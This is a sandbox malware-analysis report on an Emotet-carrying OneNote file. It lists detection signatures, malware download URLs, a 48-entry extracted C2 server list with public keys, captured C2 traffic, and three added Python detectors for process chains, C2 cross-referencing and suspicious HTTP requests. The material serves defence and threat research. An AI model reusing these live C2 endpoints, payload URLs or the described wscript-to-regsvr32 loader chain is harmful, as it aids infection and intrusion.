Windows Analysis Report
Insight_Medical_Publishing.one

Overview

General Information

Sample Name: Insight_Medical_Publishing.one
Analysis ID: 828491
MD5: ff762b2f28c3bcaaabcc6f7656f92d50
SHA1: 9448c2d43c1e7155a4003d513c95f42fd29a2b7f
SHA256: 62ff7b52aeac2e32e59d8168cd55db1522de07833d476c8e26b36f40724bbebe
Tags: one

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Malicious OneNote
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: Insight_Medical_Publishing.one ReversingLabs: Detection: 30%
Source: Insight_Medical_Publishing.one Virustotal: Detection: 40%
Source: https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/D Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/ Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/ Avira URL Cloud: Label: malware
Source: http://ozmeydan.com/cekici/9/ Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/ Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0 Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/tM Avira URL Cloud: Label: malware
Source: http://softwareulike.com/cWIYxWMPkK/ Avira URL Cloud: Label: malware
Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM Avira URL Cloud: Label: malware
Source: https://163.44.196.120:8080/jesecsgigcdk/zfgrij/wjhswvhm/ Avira URL Cloud: Label: malware
Source: http://softwareulike.com/cWIYxWMPkK/yM Avira URL Cloud: Label: malware
Source: https://182.162.143.56/jesecsgigcdk/zfgrij/wjhswvhm/ Avira URL Cloud: Label: malware
Source: https://91.121.146.47:8080/ Avira URL Cloud: Label: malware
Source: https://163.44.196.120:8080/ Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/D Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/ Avira URL Cloud: Label: malware
Source: https://164.90.222.65:443/jesecsgigcdk/zfgrij/wjhswvhm/ Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/: Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllG Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6 Avira URL Cloud: Label: malware
Source: https://163.44.196.120:8080/a Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/vM Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/RPROFIN Avira URL Cloud: Label: malware
Source: http://ozmeydan.com/cekici/9/xM Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/jesecsgigcdk/zfgrij/wjhswvhm/ Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/ Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/RPROFII Avira URL Cloud: Label: malware
Source: https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/ Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dll Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/o8 Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/&C Avira URL Cloud: Label: malware
Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/ Avira URL Cloud: Label: malware
Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/LE=C: Avira URL Cloud: Label: malware
Source: https://penshorn.org:443/admin/Ses8712iGR8du/script.createobject( Avira URL Cloud: Label: malware
Source: https://164.90.222.65/jesecsgigcdk/zfgrij/wjhswvhm/ Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll ReversingLabs: Detection: 58%
Source: C:\Windows\System32\CRCPqQPgWxqcgJu\zBLf.dll (copy) ReversingLabs: Detection: 58%
Source: 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5cZosrQAhAJI=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx285qirQAHAJQ="]}
Source: unknown HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49685 version: TLS 1.2
Source: unknown HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.4:49689 version: TLS 1.2
Source: Binary string: ain.pdb source: OneNote15WatsonLog.etl.0.dr
Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdbain.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: OneNote15WatsonLog.etl.0.dr
Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdb source: OneNote15WatsonLog.etl.0.dr
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180008D28 FindFirstFileExW, 3_2_0000000180008D28

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process created: C:\Windows\SysWOW64\wscript.exe
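The process chain this report records (ONENOTE.EXE spawning wscript.exe, which in turn runs regsvr32.exe against C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll) is what the "Document exploit detected (process start blacklist hit)" and Sigma "Run temp file via regsvr32" signatures key on. The following is an added detection example, not code from the report or from Joe Sandbox: it replays that chain over constructed Sysmon-style process-creation records and walks the parent tree of each hit. The explorer.exe root, the script file name and the exact regsvr32 command-line arguments are placeholders, not values taken from the page.

```python
import re

# Constructed Sysmon Event ID 1-style records. They model the chain this report documents
# (ONENOTE.EXE -> wscript.exe -> regsvr32.exe loading rad0767A.tmp.dll); the explorer.exe root,
# the .wsf file name and the regsvr32 argument form are placeholders, not values from the report.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 101, "ppid": 100,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" Insight_Medical_Publishing.one'},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\AppData\Local\Temp\embedded_script.wsf"'},
    {"pid": 103, "ppid": 102, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll"},
    # Benign control: an installer registering a COM server from Program Files must not fire.
    {"pid": 104, "ppid": 100, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
]

OFFICE_APPS = {"onenote.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
# A DLL (or .tmp renamed to .dll) under the user's Temp directory being handed to regsvr32.
TEMP_DLL_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\s\"]+\.(?:dll|tmp)\b", re.IGNORECASE)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Return the process chain root -> ... -> pid as lower-cased image names."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(_basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return " -> ".join(reversed(chain))


def detect(events):
    """Apply the two rules and return (rule, pid, ancestry) tuples in event order."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = _basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = _basename(parent["image"]) if parent else ""
        # Rule 1: an Office application starting a script host (process start blacklist hit).
        if parent_name in OFFICE_APPS and name in SCRIPT_HOSTS:
            findings.append(("office_spawns_script_host", e["pid"], ancestry(events, e["pid"])))
        # Rule 2: regsvr32 loading a DLL dropped under %LOCALAPPDATA%\Temp.
        if name == "regsvr32.exe" and TEMP_DLL_RE.search(e["cmdline"]):
            findings.append(("regsvr32_loads_temp_dll", e["pid"], ancestry(events, e["pid"])))
    return findings


if __name__ == "__main__":
    for rule, pid, chain in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}: {chain}")
```

The ancestry string is what makes the second hit actionable: a regsvr32.exe under explorer.exe registering a vendor DLL is routine, while the same binary three hops below ONENOTE.EXE with a Temp-directory DLL is the Emotet loader stage.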

Networking

Source: C:\Windows\System32\regsvr32.exe Network Connect: 164.90.222.65 443
Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 203.26.41.131 443
Source: C:\Windows\SysWOW64\wscript.exe Domain query: penshorn.org
Source: C:\Windows\System32\regsvr32.exe Network Connect: 66.228.32.31 7080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 187.63.160.88 80
Source: C:\Windows\System32\regsvr32.exe Network Connect: 104.168.155.143 8080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 91.121.146.47 8080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 160.16.142.56 8080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 182.162.143.56 443
Source: C:\Windows\System32\regsvr32.exe Network Connect: 167.172.199.165 8080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 163.44.196.120 8080
Source: Traffic Snort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.4:49689 -> 182.162.143.56:443
Source: Traffic Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.4:49686 -> 91.121.146.47:8080
Source: Traffic Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.4:49688 -> 66.228.32.31:7080
Source: Traffic Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.4:49691 -> 167.172.199.165:8080
Source: Traffic Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.4:49696 -> 104.168.155.143:8080
Source: Malware configuration extractor IPs: 91.121.146.47:8080
Source: Malware configuration extractor IPs: 66.228.32.31:7080
Source: Malware configuration extractor IPs: 182.162.143.56:443
Source: Malware configuration extractor IPs: 187.63.160.88:80
Source: Malware configuration extractor IPs: 167.172.199.165:8080
Source: Malware configuration extractor IPs: 164.90.222.65:443
Source: Malware configuration extractor IPs: 104.168.155.143:8080
Source: Malware configuration extractor IPs: 163.44.196.120:8080
Source: Malware configuration extractor IPs: 160.16.142.56:8080
Source: Malware configuration extractor IPs: 159.89.202.34:443
Source: Malware configuration extractor IPs: 159.65.88.10:8080
Source: Malware configuration extractor IPs: 186.194.240.217:443
Source: Malware configuration extractor IPs: 149.56.131.28:8080
Source: Malware configuration extractor IPs: 72.15.201.15:8080
Source: Malware configuration extractor IPs: 1.234.2.232:8080
Source: Malware configuration extractor IPs: 82.223.21.224:8080
Source: Malware configuration extractor IPs: 206.189.28.199:8080
Source: Malware configuration extractor IPs: 169.57.156.166:8080
Source: Malware configuration extractor IPs: 107.170.39.149:8080
Source: Malware configuration extractor IPs: 103.43.75.120:443
Source: Malware configuration extractor IPs: 91.207.28.33:8080
Source: Malware configuration extractor IPs: 213.239.212.5:443
Source: Malware configuration extractor IPs: 45.235.8.30:8080
Source: Malware configuration extractor IPs: 119.59.103.152:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 95.217.221.146:8080
Source: Malware configuration extractor IPs: 153.126.146.25:7080
Source: Malware configuration extractor IPs: 197.242.150.244:8080
Source: Malware configuration extractor IPs: 202.129.205.3:8080
Source: Malware configuration extractor IPs: 103.132.242.26:8080
Source: Malware configuration extractor IPs: 139.59.126.41:443
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 183.111.227.137:8080
Source: Malware configuration extractor IPs: 5.135.159.50:443
Source: Malware configuration extractor IPs: 201.94.166.162:443
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 79.137.35.198:8080
Source: Malware configuration extractor IPs: 172.105.226.75:8080
Source: Malware configuration extractor IPs: 94.23.45.86:4143
Source: Malware configuration extractor IPs: 115.68.227.76:8080
Source: Malware configuration extractor IPs: 153.92.5.27:8080
Source: Malware configuration extractor IPs: 167.172.253.162:8080
Source: Malware configuration extractor IPs: 188.44.20.25:443
Source: Malware configuration extractor IPs: 147.139.166.154:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 185.4.135.165:8080
Source: Malware configuration extractor IPs: 45.176.232.124:443
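The extracted configuration above lists 48 C2 endpoints, while the sandbox only had time to contact a handful of them; the rest are just as actionable for blocking. The following is an added example, not code from the report or from the extractor: it cross-references the C2 list against the connection observations this report records (in the three line formats the Networking section uses), separates contacted from dormant C2 entries, surfaces destinations the config does not explain, and turns the whole list into Suricata rules. The C2 list is trimmed to eleven entries for brevity (an assumption; the real list is the one printed above), the public keys are omitted, and the sid range is an arbitrary local choice.

```python
import json
import re

# Excerpt of the Emotet configuration the report's extractor recovered from the regsvr32.exe
# memory dump. Trimmed to eleven C2 entries and without the public keys (assumption: a subset
# is enough to show the cross-check).
CONFIG_JSON = """{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443",
 "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080",
 "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "94.23.45.86:4143"]}"""

# Observation lines in the three formats the report's Networking section uses (Snort alert,
# raw TCP flow, per-process Network Connect). Values are the report's own; only the selection
# is constructed.
OBSERVATIONS = """\
Snort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.4:49689 -> 182.162.143.56:443
Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.4:49686 -> 91.121.146.47:8080
TCP traffic: 192.168.2.4:49688 -> 66.228.32.31:7080
TCP traffic: 192.168.2.4:49691 -> 167.172.199.165:8080
TCP traffic: 192.168.2.4:49696 -> 104.168.155.143:8080
TCP traffic: 192.168.2.4:49697 -> 163.44.196.120:8080
TCP traffic: 192.168.2.4:49698 -> 160.16.142.56:8080
C:\\Windows\\System32\\regsvr32.exe Network Connect: 164.90.222.65 443
C:\\Windows\\System32\\regsvr32.exe Network Connect: 187.63.160.88 80
C:\\Windows\\SysWOW64\\wscript.exe Network Connect: 203.26.41.131 443
"""

FLOW_RE = re.compile(r"(\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)")
CONNECT_RE = re.compile(r"Network Connect: (\d+\.\d+\.\d+\.\d+) (\d+)")


def load_c2(config_json):
    """Parse the extractor JSON into a set of (ip, port) string tuples."""
    cfg = json.loads(config_json)
    return {tuple(entry.rsplit(":", 1)) for entry in cfg["C2 list"]}


def parse_destinations(text):
    """Pull (dst_ip, dst_port) out of Snort, TCP-flow and Network Connect lines."""
    dests = set()
    for line in text.splitlines():
        m = FLOW_RE.search(line)
        if m:
            dests.add((m.group(3), m.group(4)))
            continue
        m = CONNECT_RE.search(line)
        if m:
            dests.add((m.group(1), m.group(2)))
    return dests


def cross_reference(config_json, observations):
    """Split observed destinations into contacted C2, dormant C2 and unexplained hosts."""
    c2 = load_c2(config_json)
    seen = parse_destinations(observations)
    return {
        "contacted_c2": sorted(c2 & seen),
        "dormant_c2": sorted(c2 - seen),   # in config, never reached during the run
        "unexplained": sorted(seen - c2),  # reached, but not a configured C2 (payload host)
    }


def suricata_rules(c2, base_sid=9000000):
    """One outbound-connection rule per configured C2 endpoint; sid range is a local choice."""
    return [
        f'alert tcp $HOME_NET any -> {ip} {port} (msg:"Emotet C2 from extracted config '
        f'{ip}:{port}"; flow:to_server; classtype:trojan-activity; sid:{base_sid + i}; rev:1;)'
        for i, (ip, port) in enumerate(sorted(c2))
    ]


if __name__ == "__main__":
    result = cross_reference(CONFIG_JSON, OBSERVATIONS)
    for key, entries in result.items():
        print(key, ", ".join(f"{ip}:{port}" for ip, port in entries))
    print("\n".join(suricata_rules(load_c2(CONFIG_JSON))))
```

The one "unexplained" destination, 203.26.41.131:443, is the wscript.exe connection that resolved penshorn.org: the first-stage download host from the script, not an Emotet C2, which is why it is absent from the binary's configuration and belongs on a separate indicator list.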
Source: Joe Sandbox View ASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic HTTP traffic detected: POST /jesecsgigcdk/zfgrij/wjhswvhm/ HTTP/1.1
    Connection: Keep-Alive
    Content-Length: 0
    Host: 182.162.143.56
Source: Joe Sandbox View IP Address: 110.232.117.186 110.232.117.186
Source: global traffic HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: penshorn.org
Source: global traffic TCP traffic: 192.168.2.4:49686 -> 91.121.146.47:8080
Source: global traffic TCP traffic: 192.168.2.4:49688 -> 66.228.32.31:7080
Source: global traffic TCP traffic: 192.168.2.4:49691 -> 167.172.199.165:8080
Source: global traffic TCP traffic: 192.168.2.4:49696 -> 104.168.155.143:8080
Source: global traffic TCP traffic: 192.168.2.4:49697 -> 163.44.196.120:8080
Source: global traffic TCP traffic: 192.168.2.4:49698 -> 160.16.142.56:8080
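The two HTTP requests recorded above are the two stages of the infection at the wire level: the script host fetching the DLL from penshorn.org with the default User-Agent of the WinHttp.WinHttpRequest.5 COM object, and the loader's empty-bodied POST to a raw IP with no User-Agent at all (the "HTTP GET or POST without a user agent" signature). The following is an added example, not code from the report: it applies those two patterns, plus the IP-literal Host and non-standard-port tells, to constructed Zeek http.log-style records. The first two rows reproduce the report's requests; the third row and its 203.0.113.10 address are a constructed benign browser request for contrast.

```python
import ipaddress

# Tab-separated, Zeek http.log-style columns. Constructed records: rows 1 and 2 reproduce the
# requests this report captured, row 3 is a benign browser request (203.0.113.10 is TEST-NET-3).
FIELDS = ["ts", "orig_h", "orig_p", "resp_h", "resp_p",
          "method", "host", "uri", "user_agent", "request_body_len"]
HTTP_LOG = """\
1.0\t192.168.2.4\t49685\t203.26.41.131\t443\tGET\tpenshorn.org\t/admin/Ses8712iGR8du/\tMozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\t0
2.0\t192.168.2.4\t49689\t182.162.143.56\t443\tPOST\t182.162.143.56\t/jesecsgigcdk/zfgrij/wjhswvhm/\t-\t0
3.0\t192.168.2.4\t49700\t203.0.113.10\t443\tGET\twww.example.com\t/\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/110.0\t0
"""

# Default User-Agent sent by the WinHttp.WinHttpRequest.5.1 COM object when a script does not
# set one; browsers never send it, so it marks script-host downloads.
WINHTTP_UA_PREFIX = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
STANDARD_PORTS = {"80", "443"}


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def parse_http_log(text):
    return [dict(zip(FIELDS, line.split("\t"))) for line in text.splitlines() if line.strip()]


def classify(rec):
    """Return the list of tells that apply to one request (empty list means benign)."""
    tags = []
    if rec["user_agent"].startswith(WINHTTP_UA_PREFIX):
        tags.append("winhttprequest_ua")          # script-host download stage
    if rec["method"] == "POST" and rec["user_agent"] == "-" and rec["request_body_len"] == "0":
        tags.append("post_no_ua_empty_body")      # loader check-in as captured in the report
    if is_ip_literal(rec["host"]):
        tags.append("ip_literal_host")            # C2 addressed by IP, no DNS lookup
    if rec["resp_p"] not in STANDARD_PORTS:
        tags.append("nonstandard_port")           # 7080/8080/4143 in the extracted config
    return tags


def flag_http_requests(text):
    """(host + uri, tags) for every request that trips at least one rule."""
    flagged = []
    for rec in parse_http_log(text):
        tags = classify(rec)
        if tags:
            flagged.append((rec["host"] + rec["uri"], tags))
    return flagged


if __name__ == "__main__":
    for target, tags in flag_http_requests(HTTP_LOG):
        print(target, tags)
```

Run against real Zeek output, map the column names onto FIELDS and treat `post_no_ua_empty_body` combined with `ip_literal_host` as the high-confidence pair; `winhttprequest_ua` on its own also fires on legitimate VBScript or PowerShell automation and is best correlated with the process-tree rule.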
Source: unknown Network traffic detected: IP country count 17
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.146.47 (12 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 66.228.32.31 (10 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56 (9 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 187.63.160.88 (11 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 167.172.199.165 (3 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 164.90.222.65 (5 occurrences)
Source: wscript.exe, 00000001.00000003.406123541.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410685138.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407893232.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/
Source: regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/Low
Source: regsvr32.exe, 00000004.00000003.631557827.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488456435.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632847163.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000004.00000002.632774627.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?36fdbbb7baea3
